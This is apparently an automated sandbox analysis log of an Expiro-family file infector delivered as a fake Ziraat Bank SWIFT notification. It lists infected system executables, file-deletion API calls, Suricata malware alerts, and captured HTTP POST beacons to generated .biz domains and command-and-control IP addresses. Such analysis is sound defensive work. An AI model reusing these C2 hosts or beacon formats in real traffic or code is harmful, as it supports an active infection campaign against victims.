Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\lynchtmlconv.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\elevation_service.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\msoev.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\os_update_handler.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\IEContentService.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Mozilla Firefox\firefox.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Mozilla Firefox\updater.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\AutoIt3\Au3Check.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.ShowHelp.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\7-Zip\Uninstall.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe System file written: C:\Windows\System32\FXSSVC.exe
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\CLVIEW.EXE
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe System file written: C:\Windows\System32\SensorDataService.exe
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe System file written: C:\Windows\System32\msdtc.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\MSOHTMED.EXE
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe System file written: C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\Installer\setup.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe System file written: C:\Windows\System32\alg.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\7-Zip\7zFM.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\klist.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\GRAPH.EXE
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\Installer\chrmstp.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXE
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\excelcnv.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\msoadfsb.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Mozilla Firefox\private_browsing.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\notification_helper.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\AppSharingHookController.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe System file written: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\chrome_pwa_launcher.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\elevated_tracing_service.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Mozilla Firefox\plugin-container.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Code function: 0_2_0046445A GetFileAttributesW,FindFirstFileW,FindClose, 0_2_0046445A
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Code function: 0_2_0046C6D1 FindFirstFileW,FindClose, 0_2_0046C6D1
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Code function: 0_2_0046C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 0_2_0046C75C
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Code function: 0_2_0046EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_0046EF95
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Code function: 0_2_0046F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_0046F0F2
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Code function: 0_2_0046F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 0_2_0046F3F3
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Code function: 0_2_004637EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_004637EF
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Code function: 0_2_00463B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_00463B12
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Code function: 0_2_0046BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 0_2_0046BCBC
Source: C:\Windows\System32\alg.exe File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\java.exe
Source: C:\Windows\System32\alg.exe File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaw.exe
Source: C:\Windows\System32\alg.exe File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaws.exe
Source: C:\Windows\System32\alg.exe File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\java.exe
Source: C:\Windows\System32\alg.exe File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaw.exe
Source: C:\Windows\System32\alg.exe File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaws.exe

Networking

Source: Network traffic Suricata IDS: 2051649 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz) : 192.168.2.4:54634 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.4:49724 -> 72.52.178.23:80
Source: Network traffic Suricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.4:49755 -> 13.213.51.196:80
Source: Network traffic Suricata IDS: 2051648 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz) : 192.168.2.4:55274 -> 1.1.1.1:53
Source: Malware configuration extractor URLs: 204.10.161.147
Source: Malware configuration extractor URLs: 204.10.161.147:7082
Source: global traffic TCP traffic: 204.10.161.147 ports 7082,7081,0,2,7,8
Source: unknown DNS traffic detected: English language letter frequency does not match the domain names
Source: unknown Network traffic detected: DNS query count 49
Source: global traffic TCP traffic: 192.168.2.4:49723 -> 204.10.161.147:7082
Source: Joe Sandbox View IP Address: 13.248.148.254 13.248.148.254
Source: Network traffic Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 52.11.240.239:80 -> 192.168.2.4:49717
Source: Network traffic Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 52.11.240.239:80 -> 192.168.2.4:49717
Source: Network traffic Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 34.245.175.187:80 -> 192.168.2.4:49760
Source: Network traffic Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 34.245.175.187:80 -> 192.168.2.4:49760
Source: Network traffic Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 52.43.119.120:80 -> 192.168.2.4:49767
Source: Network traffic Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 52.43.119.120:80 -> 192.168.2.4:49767
Source: Network traffic Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 54.169.144.97:80 -> 192.168.2.4:49751
Source: Network traffic Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 54.169.144.97:80 -> 192.168.2.4:49751
Source: Network traffic Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 52.26.80.133:80 -> 192.168.2.4:49787
Source: Network traffic Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 52.26.80.133:80 -> 192.168.2.4:49787
Source: Network traffic Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 34.229.166.50:80 -> 192.168.2.4:49776
Source: Network traffic Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 34.229.166.50:80 -> 192.168.2.4:49776
Source: Network traffic Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 54.85.87.184:80 -> 192.168.2.4:49768
Source: Network traffic Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 54.85.87.184:80 -> 192.168.2.4:49768
Source: Network traffic Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 3.229.117.57:80 -> 192.168.2.4:49722
Source: Network traffic Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 3.229.117.57:80 -> 192.168.2.4:49722
Source: Network traffic Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 52.212.150.54:80 -> 192.168.2.4:49795
Source: Network traffic Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 52.212.150.54:80 -> 192.168.2.4:49795
Source: Network traffic Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 18.142.91.111:80 -> 192.168.2.4:49752
Source: Network traffic Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 18.142.91.111:80 -> 192.168.2.4:49752
Source: Network traffic Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 13.213.51.196:80 -> 192.168.2.4:49779
Source: Network traffic Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 13.213.51.196:80 -> 192.168.2.4:49779
Source: global traffic HTTP traffic detected: POST /oqcvpoewhl HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /bwejhhjeahxfje HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 836
Source: global traffic HTTP traffic detected: POST /bspqodujb HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ssbzmoy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /arkfkq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: cvgrf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /buysxojjpcbe HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: npukfztj.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /uhxgrttve HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: GET /uhxgrttve?usid=25&utid=9755593280 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww12.przvgke.biz
Source: global traffic HTTP traffic detected: POST /twetxppkkq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: knjghuig.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /xltkhwus HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
Source: global traffic HTTP traffic detected: POST /srydcadgxm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: xlfhhhm.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /ldqqpocfqndx HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ifsaia.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /kobojotdnctbldt HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: saytjshyf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /llpwgsaooq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vcddkls.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /yhgrkvedbhvggxwh HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: fwiwk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: GET /yhgrkvedbhvggxwh?usid=25&utid=9755608042 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww7.fwiwk.biz
Source: global traffic HTTP traffic detected: POST /okybrjufbtsub HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: fwiwk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: GET /okybrjufbtsub?usid=25&utid=9755608117 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww12.fwiwk.biz
Source: global traffic HTTP traffic detected: POST /om HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: tbjrpv.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
